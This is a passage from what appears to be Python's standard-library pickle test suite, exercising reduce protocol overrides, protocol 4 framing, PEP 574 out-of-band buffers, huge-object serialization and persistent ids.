self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compactness of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
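# Helper: pickle obj with the given protocol, assert that the expected
# opcode appears in the output, and check that the value round-trips.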
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for the small objects between the
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) interleaved with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't be too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
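# Memory-hungry tests (multiple GiB) covering huge int, bytes and str
# payloads: they check the emitted length headers, or the errors raised,
# on each protocol.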
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1 byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
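# Tests exercising the module-level pickle API (dump/load round-trips,
# call signatures, error handling, and out-of-band buffer plumbing).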
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.load, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
